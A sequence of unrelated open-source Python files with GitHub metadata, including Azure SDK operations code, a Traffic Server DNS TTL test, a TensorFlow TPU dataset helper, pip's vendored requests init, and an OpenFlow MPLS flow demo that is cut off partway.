:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either AgentPool or the result of
cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.containerservice.v2021_05_01.models.AgentPool]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop("api_version", _params.pop("api-version", "2021-05-01")) # type: Literal["2021-05-01"]
cls = kwargs.pop("cls", None) # type: ClsType[None]
polling = kwargs.pop("polling", True) # type: Union[bool, AsyncPollingMethod]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = await self._upgrade_node_image_version_initial( # type: ignore
resource_group_name=resource_group_name,
resource_name=resource_name,
agent_pool_name=agent_pool_name,
api_version=api_version,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize("AgentPool", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True:
polling_method = cast(AsyncPollingMethod, AsyncARMPolling(lro_delay, **kwargs)) # type: AsyncPollingMethod
elif polling is False:
polling_method = cast(AsyncPollingMethod, AsyncNoPolling())
else:
polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_upgrade_node_image_version.metadata = {"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools/{agentPoolName}/upgradeNodeImageVersion"} # type: ignore
| {
"content_hash": "0826012ed8f82e63c26634f1c9171458",
"timestamp": "",
"source": "github",
"line_count": 819,
"max_line_length": 263,
"avg_line_length": 47.7997557997558,
"alnum_prop": 0.6479513640543578,
"repo_name": "Azure/azure-sdk-for-python",
"id": "97f61edd1806ef8efda0bfe7ffb806d300689e96",
"size": "39648",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "sdk/containerservice/azure-mgmt-containerservice/azure/mgmt/containerservice/v2021_05_01/aio/operations/_agent_pools_operations.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1224"
},
{
"name": "Bicep",
"bytes": "24196"
},
{
"name": "CSS",
"bytes": "6089"
},
{
"name": "Dockerfile",
"bytes": "4892"
},
{
"name": "HTML",
"bytes": "12058"
},
{
"name": "JavaScript",
"bytes": "8137"
},
{
"name": "Jinja",
"bytes": "10377"
},
{
"name": "Jupyter Notebook",
"bytes": "272022"
},
{
"name": "PowerShell",
"bytes": "518535"
},
{
"name": "Python",
"bytes": "715484989"
},
{
"name": "Shell",
"bytes": "3631"
}
],
"symlink_target": ""
} |
'''
Test DNS TTL behavior.
'''
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import ports
Test.Summary = 'Test DNS TTL behavior'
class TtlDnsTest:
single_transaction_replay = "replay/single_transaction.replay.yaml"
server_error_replay = "replay/server_error.replay.yaml"
process_counter = 1
# The TTL to set for every resolved hostname.
dnsTTL = 1
# The DNS query timeout.
queryTimeout = 1
def __init__(self, configure_serve_stale=False, exceed_serve_stale=False):
"""
Args:
configure_serve_stale: (bool) Whether the ATS process should be configured to
serve stale DNS entries.
exceed_serve_stale: (bool) Configure the serve_stale timeout to be low
enough that the timed out DNS response will not be used.
"""
self.configure_serve_stale = configure_serve_stale
self.exceed_serve_stale = exceed_serve_stale
self.server_process_counter = TtlDnsTest.get_unique_process_counter()
TtlDnsTest.process_counter += 1
self.setupOriginServer()
self.setupTS()
@classmethod
def get_unique_process_counter(cls):
this_counter = cls.process_counter
cls.process_counter += 1
return this_counter
def addDNSServerToTestRun(self, test_run):
dns = test_run.MakeDNServer("dns", port=self.dns_port)
dns.addRecords(records={'resolve.this.com': ['127.0.0.1']})
return dns
def setupOriginServer(self):
self.server = Test.MakeVerifierServerProcess(
f"server-{self.server_process_counter}", TtlDnsTest.single_transaction_replay)
def setupTS(self):
self.ts = Test.MakeATSProcess(
f"ts-{self.server_process_counter}", enable_cache=False)
self.dns_port = ports.get_port(self.ts, 'dns_port')
self.ts.Disk.records_config.update({
"proxy.config.diags.debug.enabled": 1,
"proxy.config.diags.debug.tags": "dns",
'proxy.config.dns.nameservers': f'127.0.0.1:{self.dns_port}',
'proxy.config.dns.resolv_conf': 'NULL',
# Configure ATS to treat each resolved name to have a 1 second
# time to live.
"proxy.config.hostdb.ttl_mode": 1,
"proxy.config.hostdb.timeout": self.dnsTTL,
# MicroDNS will be down for the second transaction. Have ATS give
# up trying to talk to it after one second.
"proxy.config.hostdb.lookup_timeout": self.queryTimeout,
})
if self.configure_serve_stale:
if self.exceed_serve_stale:
stale_timeout = 1
else:
stale_timeout = 300
self.ts.Disk.records_config.update({
"proxy.config.hostdb.serve_stale_for": stale_timeout
})
self.ts.Disk.remap_config.AddLine(
f"map / http://resolve.this.com:{self.server.Variables.http_port}/")
def testRunWithDNS(self):
tr = Test.AddTestRun()
# Run the DNS server with this test run so it will not be running in
# the next one.
dns = self.addDNSServerToTestRun(tr)
process_number = TtlDnsTest.get_unique_process_counter()
tr.AddVerifierClientProcess(
f"client-{process_number}",
TtlDnsTest.single_transaction_replay,
http_ports=[self.ts.Variables.port])
tr.Processes.Default.StartBefore(dns)
tr.Processes.Default.StartBefore(self.server)
tr.Processes.Default.StartBefore(self.ts)
tr.StillRunningAfter = dns
tr.StillRunningAfter = self.server
tr.StillRunningAfter = self.ts
def testRunWithoutDNS(self):
tr = Test.AddTestRun()
# Delay running the second transaction for long enough to guarantee
# that both the TTL and the DNS query timeout (lookup_timeout) are
# exceeded.
tr.DelayStart = 3
# Will the stale resolved DNS response be used?
if self.configure_serve_stale and not self.exceed_serve_stale:
# Yes: expect a proxied transaction with a 200 OK response.
replay_file = TtlDnsTest.single_transaction_replay
else:
# No: expect a 5xx response because the server name could not be
# resolved.
replay_file = TtlDnsTest.server_error_replay
process_number = TtlDnsTest.get_unique_process_counter()
tr.AddVerifierClientProcess(
f"client-{process_number}",
replay_file, http_ports=[self.ts.Variables.port])
tr.StillRunningAfter = self.server
tr.StillRunningAfter = self.ts
def run(self):
self.testRunWithDNS()
self.testRunWithoutDNS()
TtlDnsTest().run()
TtlDnsTest(configure_serve_stale=True, exceed_serve_stale=False).run()
TtlDnsTest(configure_serve_stale=True, exceed_serve_stale=True).run()
| {
"content_hash": "47698fcad6264daca9da16842b555527",
"timestamp": "",
"source": "github",
"line_count": 152,
"max_line_length": 90,
"avg_line_length": 37.26315789473684,
"alnum_prop": 0.6486581920903954,
"repo_name": "SolidWallOfCode/trafficserver",
"id": "cd0d7ff6299667471d57e317c20a7dda6e836470",
"size": "5664",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "tests/gold_tests/dns/dns_ttl.test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "1437789"
},
{
"name": "C++",
"bytes": "17168056"
},
{
"name": "CMake",
"bytes": "13151"
},
{
"name": "Dockerfile",
"bytes": "6693"
},
{
"name": "Java",
"bytes": "9881"
},
{
"name": "Lua",
"bytes": "64412"
},
{
"name": "M4",
"bytes": "222699"
},
{
"name": "Makefile",
"bytes": "255714"
},
{
"name": "Objective-C",
"bytes": "13042"
},
{
"name": "Perl",
"bytes": "128436"
},
{
"name": "Python",
"bytes": "1569159"
},
{
"name": "Rust",
"bytes": "2591"
},
{
"name": "SWIG",
"bytes": "25777"
},
{
"name": "Shell",
"bytes": "178570"
},
{
"name": "Starlark",
"bytes": "987"
},
{
"name": "Vim Script",
"bytes": "192"
}
],
"symlink_target": ""
} |
import unittest
from pycomb import combinators, context
from pycomb.combinators import dictionary
from pycomb.test import util
class TestDictionary(unittest.TestCase):
def test_ok(self):
d = {
1: 'hello',
2: 'Hello',
3: 4
}
sut = dictionary(combinators.Int, combinators.union(combinators.String, combinators.Int))
sut(d)
def test_values(self):
d = {
1: 'hello',
2: 'Hello',
3: 4
}
sut = dictionary(combinators.Int, combinators.String)
with util.throws_with_message('Error on dictionary(Int: String)[3]: expected String but was int'):
sut(d)
def test_keys(self):
d = {
'hello': 1,
1: 2,
4: 3
}
sut = dictionary(combinators.Int, combinators.Int)
with util.throws_with_message('Error on dictionary(Int: Int).hello: expected Int but was str'):
sut(d)
def test_values_with_name(self):
d = {
1: 'hello',
2: 'Hello',
3: 4
}
sut = dictionary(combinators.Int, combinators.String, name='IntStringDict')
with util.throws_with_message('Error on IntStringDict[3]: expected String but was int'):
sut(d)
def test_keys_with_name(self):
d = {
'hello': 1,
1: 2,
4: 3
}
sut = dictionary(combinators.Int, combinators.Int, name='IntIntDict')
with util.throws_with_message('Error on IntIntDict.hello: expected Int but was str'):
sut(d)
def test_no_dict(self):
d = object()
sut = dictionary(combinators.Int, combinators.Int)
with util.throws_with_message('Error on dictionary(Int: Int): expected dictionary(Int: Int) but was object'):
sut(d)
sut = dictionary(combinators.Int, combinators.Int, name='ADict')
with util.throws_with_message('Error on ADict: expected ADict but was object'):
sut(d)
def test_production_mode(self):
ctx = context.create(production_mode=True)
d = {
1: 'hello',
2: 'Hello',
3: 4
}
sut = dictionary(combinators.Int, combinators.String)
self.assertIs(d, sut(d, ctx=ctx))
d = {
'hello': 1,
1: 2,
4: 3
}
sut = dictionary(combinators.Int, combinators.Int)
self.assertIs(d, sut(d, ctx=ctx))
d = object()
sut = dictionary(combinators.Int, combinators.Int)
self.assertIs(d, sut(d, ctx=ctx))
| {
"content_hash": "e7b12bac9a18ef9df0125e366f68f58f",
"timestamp": "",
"source": "github",
"line_count": 92,
"max_line_length": 117,
"avg_line_length": 28.793478260869566,
"alnum_prop": 0.5432238580596451,
"repo_name": "fcracker79/pycomb",
"id": "820f89963bb0b0627faea22733573e55e3920aa9",
"size": "2649",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pycomb/test/test_dictionary.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "70771"
},
{
"name": "Shell",
"bytes": "183"
}
],
"symlink_target": ""
} |
"""Library of Cloud TPU helper functions for data loading."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.data.experimental.ops import batching
from tensorflow.python.data.experimental.ops import interleave_ops
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.data.ops import iterator_ops
from tensorflow.python.data.ops import readers
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.ops import functional_ops
def _TextLineDataset(filename):
buffer_size = 8 * 1024 * 1024 # 8 MiB per file
dataset = readers.TextLineDataset(filename, buffer_size=buffer_size)
return dataset
def _TFRecordDataset(filename):
buffer_size = 8 * 1024 * 1024 # 8 MiB per file
dataset = readers.TFRecordDataset(filename, buffer_size=buffer_size)
return dataset
_FILETYPE_MAP = {
'tfrecord': _TFRecordDataset,
'textline': _TextLineDataset,
'text': _TextLineDataset,
}
def StreamingFilesDataset(files,
filetype=None,
file_reader_job=None,
worker_job=None,
num_epochs=None,
filename_shuffle_buffer_size=None,
num_parallel_reads=None,
batch_transfer_size=None,
sloppy=None):
"""StreamingFilesDataset constructs a dataset to stream from workers (GCE VM).
Because Cloud TPUs are allocated over the network, a Cloud TPU cannot read
files local to your GCE VM. In order to train using files stored on your local
VM (e.g. on local SSD for extreme performance), use the StreamingFilesDataset
helper to generate a dataset to feed your Cloud TPU with files from your GCE
VM.
The resulting dataset may return an OutOfRangeError if there are no files
found as a result of the fileglob expansion.
Note: StreamingFilesDataset assumes that the session is using a
TPUClusterResolver and has therefore a worker and a coordinator job. File
loading will be done on the coordinator job.
Args:
files: A string glob to match files, or a `tf.data.Dataset` generating file
names.
filetype: A string (one of 'tfrecord', or 'textline') or a single-argument
TensorFlow function that when given a filename returns a dataset.
file_reader_job: An optional string that corresponds to the job that should
perform the file reads.
worker_job: An optional string that corresponds to the job that should
process the tensors (i.e. your GPU or TPU worker).
num_epochs: The number of epochs through the training set that should be
generated. By default, it will repeat infinitely.
filename_shuffle_buffer_size: An optional integer whose value controls the
shuffling of the file names. If you would like to read from the files in
the same order, set to 0 or False.
num_parallel_reads: An optional integer controlling the number of files to
read from concurrently. (Set to 1 for no parallelism.)
batch_transfer_size: An optional integer controlling the batching used to
amortize the remote function invocation overhead. Set to a very large
number to increase throughput. Set to a very small number to reduce memory
consumption. Set to False to skip batching.
sloppy: (Optional.) If `False`, read input data while maintaining a
deterministic order. (This may have significant performance impacts.)
sloppy defaults to: True.
Returns:
A `tf.data.Dataset` with an infinite stream of elements generated by a
parallel interleaving of the set of files matched (or generated) by `files`
with a type is the output of the dataset specified by `filetype`.
Raises:
ValueError: if any argument is not of the expected type.
"""
if filetype is None:
filetype = 'tfrecord'
if isinstance(filetype, str):
if filetype not in _FILETYPE_MAP:
raise ValueError('Unexpected filetype: %s' % filetype)
reader_fn = _FILETYPE_MAP[filetype]
elif callable(filetype):
reader_fn = filetype
else:
raise ValueError('filetype should be a string or a callable')
file_reader_job = file_reader_job or 'coordinator'
worker_job = worker_job or 'worker'
if filename_shuffle_buffer_size is None:
filename_shuffle_buffer_size = 4096
num_parallel_reads = num_parallel_reads or 8
if batch_transfer_size is None:
batch_transfer_size = 256
if sloppy is None:
sloppy = True
with ops.device('/job:%s' % file_reader_job):
if isinstance(files, str):
source_dataset = dataset_ops.Dataset.list_files(files)
elif isinstance(files, dataset_ops.Dataset):
source_dataset = files
else:
raise ValueError('files was not a string or a dataset: %s' % files)
if filename_shuffle_buffer_size:
source_dataset = source_dataset.shuffle(
buffer_size=filename_shuffle_buffer_size)
# NOTE: We perform the `repeat` on the source dataset, because the output
# dataset does not currently have enough information to recreate an iterator
# over the source dataset when it reaches the end.
source_dataset = source_dataset.repeat(num_epochs)
source_dataset = source_dataset.apply(
interleave_ops.parallel_interleave(
reader_fn, cycle_length=num_parallel_reads, sloppy=sloppy))
if batch_transfer_size:
source_dataset = source_dataset.batch(batch_transfer_size)
source_dataset = source_dataset.prefetch(1)
source_iterator = source_dataset.make_one_shot_iterator()
source_handle = source_iterator.string_handle()
@function.Defun(dtypes.string)
def LoadingFunc(h):
remote_iterator = iterator_ops.Iterator.from_string_handle(
h, source_dataset.output_types, source_dataset.output_shapes)
return remote_iterator.get_next()
def MapFn(unused_input):
if isinstance(source_dataset.output_types, dtypes.DType):
output_types = [source_dataset.output_types]
elif isinstance(source_dataset.output_types, (list, tuple)):
output_types = source_dataset.output_types
else:
raise ValueError('source dataset has invalid output types')
remote_calls = functional_ops.remote_call(
args=[source_handle],
Tout=output_types,
f=LoadingFunc,
target='/job:%s/replica:0/task:0/cpu:0' % file_reader_job)
if len(remote_calls) == 1:
return remote_calls[0]
else:
return remote_calls
with ops.device('/job:%s' % worker_job):
output_dataset = dataset_ops.Dataset.range(2).repeat().map(
MapFn, num_parallel_calls=4 if sloppy else None)
output_dataset = output_dataset.prefetch(1)
if batch_transfer_size:
# Undo the batching used during the transfer.
output_dataset = output_dataset.apply(batching.unbatch()).prefetch(1)
return output_dataset
| {
"content_hash": "f6f4ffff001ed4d082396ad0a8560323",
"timestamp": "",
"source": "github",
"line_count": 180,
"max_line_length": 80,
"avg_line_length": 39.06666666666667,
"alnum_prop": 0.7060580204778157,
"repo_name": "girving/tensorflow",
"id": "c694e9c1bca10d9930492c29dd1c3cbc7f7f5d04",
"size": "7681",
"binary": false,
"copies": "7",
"ref": "refs/heads/master",
"path": "tensorflow/contrib/tpu/python/tpu/datasets.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "3325"
},
{
"name": "Batchfile",
"bytes": "10132"
},
{
"name": "C",
"bytes": "343258"
},
{
"name": "C#",
"bytes": "8446"
},
{
"name": "C++",
"bytes": "50036869"
},
{
"name": "CMake",
"bytes": "196127"
},
{
"name": "Dockerfile",
"bytes": "36386"
},
{
"name": "Go",
"bytes": "1254086"
},
{
"name": "HTML",
"bytes": "4681865"
},
{
"name": "Java",
"bytes": "867313"
},
{
"name": "Jupyter Notebook",
"bytes": "2604735"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "Makefile",
"bytes": "58787"
},
{
"name": "Objective-C",
"bytes": "15650"
},
{
"name": "Objective-C++",
"bytes": "99243"
},
{
"name": "PHP",
"bytes": "1357"
},
{
"name": "Perl",
"bytes": "7536"
},
{
"name": "PureBasic",
"bytes": "25356"
},
{
"name": "Python",
"bytes": "42041620"
},
{
"name": "Ruby",
"bytes": "553"
},
{
"name": "Shell",
"bytes": "477299"
},
{
"name": "Smarty",
"bytes": "6976"
}
],
"symlink_target": ""
} |
import multiprocessing
import random
workId = 0
class Work:
def __init__(self, part, startIndex, debug=False, depth=0):
global workId
self.startIndex = startIndex
self.part = part
self.pivot = None
self.works = []
# for debugging only
self.debug = debug
self.depth = depth
self.prefix = " " * self.depth
def startPartitioning(self):
if self.debug:
print("{}{}: start partitioning list: {}".format(self.prefix, multiprocessing.current_process().name, self.part))
pivot = self.part[0]
lessPart = []
morePart = []
for x in self.part:
if x < pivot:
lessPart.append(x)
elif x > pivot:
morePart.append(x)
else:
pass
if len(lessPart) > 0:
w = Work(lessPart, self.startIndex, debug=self.debug, depth=self.depth + 1)
self.works.append(w)
if len(morePart) > 0:
w = Work(morePart, self.startIndex + len(lessPart) + 1, debug=self.debug, depth=self.depth + 1)
self.works.append(w)
self.pivot = (pivot, self.startIndex + len(lessPart))
def __str__(self):
s = "{}startIndex {} pivot {} works [".format(self.prefix, self.startIndex, self.pivot)
for w in self.works:
assert isinstance(w, Work)
s += "{"
s += "startIndex {} part {}".format(w.startIndex, w.part)
s += "}"
if w is not self.works[-1]:
s += ", "
s += "]"
return s
def f(w):
assert isinstance(w, Work)
w.startPartitioning()
return w
def qsort(items, debug=False):
pool = multiprocessing.Pool(multiprocessing.cpu_count())
w = Work(items, 0, debug=debug)
pendingWorks = [w]
result = [-1] * len(items)
while len(pendingWorks) > 0:
worksDone = pool.map(f, pendingWorks, chunksize=5)
pendingWorks.clear()
for w in worksDone:
assert isinstance(w, Work)
if debug:
print(w)
value, index = w.pivot
result[index] = value
# Alternatively we can also choose to optimize away trivial works with single item.
pendingWorks.extend(w.works)
return result
sample = random.sample(range(100), 10)
print("->", sample)
print("sorted list:", qsort(sample, debug=True))
| {
"content_hash": "7ce9e2d2705d8659e037c1efbcf0ae59",
"timestamp": "",
"source": "github",
"line_count": 91,
"max_line_length": 125,
"avg_line_length": 27.054945054945055,
"alnum_prop": 0.5446791226645004,
"repo_name": "bennyk/MyPythonEssentialsClass-2015",
"id": "0479bcae3a9c0298ca01be28648af858daadcecb",
"size": "2463",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "samples/quicksort/pool-main.py",
"mode": "33188",
"license": "mit",
"language": [],
"symlink_target": ""
} |
"""
Requests HTTP Library
~~~~~~~~~~~~~~~~~~~~~
Requests is an HTTP library, written in Python, for human beings. Basic GET
usage:
>>> import requests
>>> r = requests.get('https://www.python.org')
>>> r.status_code
200
>>> 'Python is a programming language' in r.content
True
... or POST:
>>> payload = dict(key1='value1', key2='value2')
>>> r = requests.post('http://httpbin.org/post', data=payload)
>>> print(r.text)
{
...
"form": {
"key2": "value2",
"key1": "value1"
},
...
}
The other HTTP methods are supported - see `requests.api`. Full documentation
is at <http://python-requests.org>.
:copyright: (c) 2017 by Kenneth Reitz.
:license: Apache 2.0, see LICENSE for more details.
"""
from pip._vendor import urllib3
from pip._vendor import chardet
import warnings
from .exceptions import RequestsDependencyWarning
def check_compatibility(urllib3_version, chardet_version):
urllib3_version = urllib3_version.split('.')
assert urllib3_version != ['dev'] # Verify urllib3 isn't installed from git.
# Sometimes, urllib3 only reports its version as 16.1.
if len(urllib3_version) == 2:
urllib3_version.append('0')
# Check urllib3 for compatibility.
major, minor, patch = urllib3_version # noqa: F811
major, minor, patch = int(major), int(minor), int(patch)
# urllib3 >= 1.21.1, <= 1.23
assert major == 1
assert minor >= 21
assert minor <= 23
# Check chardet for compatibility.
major, minor, patch = chardet_version.split('.')[:3]
major, minor, patch = int(major), int(minor), int(patch)
# chardet >= 3.0.2, < 3.1.0
assert major == 3
assert minor < 1
assert patch >= 2
def _check_cryptography(cryptography_version):
# cryptography < 1.3.4
try:
cryptography_version = list(map(int, cryptography_version.split('.')))
except ValueError:
return
if cryptography_version < [1, 3, 4]:
warning = 'Old version of cryptography ({0}) may cause slowdown.'.format(cryptography_version)
warnings.warn(warning, RequestsDependencyWarning)
# Check imported dependencies for compatibility.
try:
check_compatibility(urllib3.__version__, chardet.__version__)
except (AssertionError, ValueError):
warnings.warn("urllib3 ({0}) or chardet ({1}) doesn't match a supported "
"version!".format(urllib3.__version__, chardet.__version__),
RequestsDependencyWarning)
# Attempt to enable urllib3's SNI support, if possible
from pip._internal.compat import WINDOWS
if not WINDOWS:
try:
from pip._vendor.urllib3.contrib import pyopenssl
pyopenssl.inject_into_urllib3()
# Check cryptography version
from cryptography import __version__ as cryptography_version
_check_cryptography(cryptography_version)
except ImportError:
pass
# urllib3's DependencyWarnings should be silenced.
from pip._vendor.urllib3.exceptions import DependencyWarning
warnings.simplefilter('ignore', DependencyWarning)
from .__version__ import __title__, __description__, __url__, __version__
from .__version__ import __build__, __author__, __author_email__, __license__
from .__version__ import __copyright__, __cake__
from . import utils
from . import packages
from .models import Request, Response, PreparedRequest
from .api import request, get, head, post, patch, put, delete, options
from .sessions import session, Session
from .status_codes import codes
from .exceptions import (
RequestException, Timeout, URLRequired,
TooManyRedirects, HTTPError, ConnectionError,
FileModeWarning, ConnectTimeout, ReadTimeout
)
# Set default logging handler to avoid "No handler found" warnings.
import logging
try: # Python 2.7+
from logging import NullHandler
except ImportError:
class NullHandler(logging.Handler):
def emit(self, record):
pass
logging.getLogger(__name__).addHandler(NullHandler())
# FileModeWarnings go off per the default.
warnings.simplefilter('default', FileModeWarning, append=True)
| {
"content_hash": "9870979f925c50647af18e7d3944647f",
"timestamp": "",
"source": "github",
"line_count": 131,
"max_line_length": 102,
"avg_line_length": 31.267175572519083,
"alnum_prop": 0.67626953125,
"repo_name": "stopstalk/stopstalk-deployment",
"id": "9fb6633ed8bd620e47d1dbef5e23f09c80e6a24f",
"size": "4203",
"binary": false,
"copies": "8",
"ref": "refs/heads/master",
"path": "aws_lambda/spoj_aws_lambda_function/lambda_code/pip/_vendor/requests/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "40171"
},
{
"name": "CSS",
"bytes": "83271"
},
{
"name": "Cython",
"bytes": "123663"
},
{
"name": "HTML",
"bytes": "190175"
},
{
"name": "JavaScript",
"bytes": "681456"
},
{
"name": "Less",
"bytes": "78481"
},
{
"name": "Makefile",
"bytes": "98"
},
{
"name": "Python",
"bytes": "7648306"
},
{
"name": "SCSS",
"bytes": "79489"
},
{
"name": "Shell",
"bytes": "6187"
},
{
"name": "XSLT",
"bytes": "152770"
}
],
"symlink_target": ""
} |
import os
import unittest
from mi.core.log import get_logger
from mi.dataset.dataset_driver import ParticleDataHandler
from mi.dataset.driver.pco2w_abc.imodem.pco2w_abc_imodem_recovered_driver import parse
from mi.dataset.driver.pco2w_abc.imodem.resource import RESOURCE_PATH
__author__ = 'mworden'
log = get_logger()
class DriverTest(unittest.TestCase):
def test_one(self):
source_file_path = os.path.join(RESOURCE_PATH, 'pco2wXYZ_11212014_1624.DAT')
particle_data_handler = ParticleDataHandler()
particle_data_handler = parse(None, source_file_path, particle_data_handler)
log.debug("SAMPLES: %s", particle_data_handler._samples)
log.debug("FAILURE: %s", particle_data_handler._failure)
self.assertEquals(particle_data_handler._failure, False)
if __name__ == '__main__':
test = DriverTest('test_one')
test.test_one()
| {
"content_hash": "59e39cb9348acb44a3b159cfe2ac0459",
"timestamp": "",
"source": "github",
"line_count": 31,
"max_line_length": 86,
"avg_line_length": 28.741935483870968,
"alnum_prop": 0.7115600448933782,
"repo_name": "oceanobservatories/mi-instrument",
"id": "8fc4d6333d36d14b66d7171337f485d41d67a11e",
"size": "891",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "mi/dataset/driver/pco2w_abc/imodem/test/test_pco2w_abc_imodem_recovered_driver.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "HTML",
"bytes": "4746"
},
{
"name": "Python",
"bytes": "10221924"
}
],
"symlink_target": ""
} |
"""
@authors: Sergei Garbuzov
@status: Development
@version: 1.1.0
"""
import time
from pybvc.controller.controller import Controller
from pybvc.openflowdev.ofswitch import (OFSwitch,
FlowEntry,
Match,
Instruction,
SetMplsTTLAction,
DecMplsTTLAction,
OutputAction)
from pybvc.common.utils import load_dict_from_file
from pybvc.common.status import STATUS
from pybvc.common.constants import ETH_TYPE_MPLS_UCAST
def delete_flows(ofswitch, table_id, flow_ids):
for flow_id in flow_ids:
result = ofswitch.delete_flow(table_id, flow_id)
status = result.get_status()
if(status.eq(STATUS.OK)):
print ("<<< Flow with id of '%s' successfully removed "
"from the Controller" % flow_id)
else:
print ("!!!Flow '%s' removal error, reason: %s" %
(flow_id, status.brief()))
def of_demo_42():
f = "cfg.yml"
d = {}
if(load_dict_from_file(f, d) is False):
print("Config file '%s' read error: " % f)
exit(0)
try:
ctrlIpAddr = d['ctrlIpAddr']
ctrlPortNum = d['ctrlPortNum']
ctrlUname = d['ctrlUname']
ctrlPswd = d['ctrlPswd']
nodeName = d['nodeName']
rundelay = d['rundelay']
except:
print ("Failed to get Controller device attributes")
exit(0)
print ("<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<")
print ("<<< Demo 42 Start")
print ("<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<")
ctrl = Controller(ctrlIpAddr, ctrlPortNum, ctrlUname, ctrlPswd)
ofswitch = OFSwitch(ctrl, nodeName)
print ("<<< 'Controller': %s, 'OpenFlow' switch: '%s'" %
(ctrlIpAddr, nodeName))
first_flow_id = 110
# ---------------------------------------------------
# First flow entry
# ---------------------------------------------------
table_id = 0
flow_id = first_flow_id
flow_name = "Modify MPLS TTL example1"
priority = 900
cookie = 1300
match_in_port = 3
match_eth_type = ETH_TYPE_MPLS_UCAST
match_mpls_label = 567
act_mod_mpls_ttl = 2
act_out_port = 112
print "\n"
print ("<<< Set OpenFlow flow on the Controller")
print (" Match: Input Port (%s)\n"
" Ethernet Type (%s)\n"
" MPLS Label (%s)" %
(match_in_port,
hex(match_eth_type),
match_mpls_label))
print (" Actions: Set MPLS TTL (%s)\n"
" Output (%s)" %
(act_mod_mpls_ttl, act_out_port))
time.sleep(rundelay)
# Allocate a placeholder for the Flow Entry
flow_entry1 = FlowEntry()
# Generic attributes of the Flow Entry
flow_entry1.set_flow_table_id(table_id)
flow_entry1.set_flow_name(flow_name)
flow_entry1.set_flow_id(flow_id)
flow_entry1.set_flow_cookie(cookie)
flow_entry1.set_flow_priority(priority)
flow_entry1.set_flow_hard_timeout(0)
flow_entry1.set_flow_idle_timeout(0)
# Instructions/Actions for the Flow Entry
instruction = Instruction(instruction_order=0)
action_order = 0
action = SetMplsTTLAction(action_order)
action.set_ttl(act_mod_mpls_ttl)
instruction.add_apply_action(action)
action_order += 1
action = OutputAction(action_order)
action.set_outport(act_out_port)
instruction.add_apply_action(action)
flow_entry1.add_instruction(instruction)
# Match Fields for the Flow Entry
match = Match()
match.set_in_port(match_in_port)
match.set_eth_type(match_eth_type)
match.set_mpls_label(match_mpls_label)
flow_entry1.add_match(match)
print ("\n")
print ("<<< Flow to send:")
print flow_entry1.get_payload()
time.sleep(rundelay)
result = ofswitch.add_modify_flow(flow_entry1)
status = result.get_status()
if(status.eq(STATUS.OK)):
print ("<<< Flow successfully added to the Controller")
else:
print ("\n")
print ("!!!Demo terminated, reason: %s" % status.detailed())
delete_flows(ofswitch, table_id, range(first_flow_id, flow_id + 1))
exit(0)
# ---------------------------------------------------
# Second flow entry
# ---------------------------------------------------
table_id = 0
flow_id += 1
flow_name = "Modify MPLS TTL example2"
priority = 900
cookie = 1300
match_in_port = 112
match_eth_type = ETH_TYPE_MPLS_UCAST
match_mpls_label = 567
act_out_port = 3
print "\n"
print ("<<< Set OpenFlow flow on the Controller")
print (" Match: Input Port (%s)\n"
" Ethernet Type (%s)\n"
" MPLS Label (%s)" %
(match_in_port,
hex(match_eth_type),
match_mpls_label))
print (" Actions: Decrement MPLS TTL\n"
" Output (%s)" %
(act_out_port))
time.sleep(rundelay)
# Allocate a placeholder for the Flow Entry
flow_entry2 = FlowEntry()
# Generic attributes of the Flow Entry
flow_entry2.set_flow_table_id(table_id)
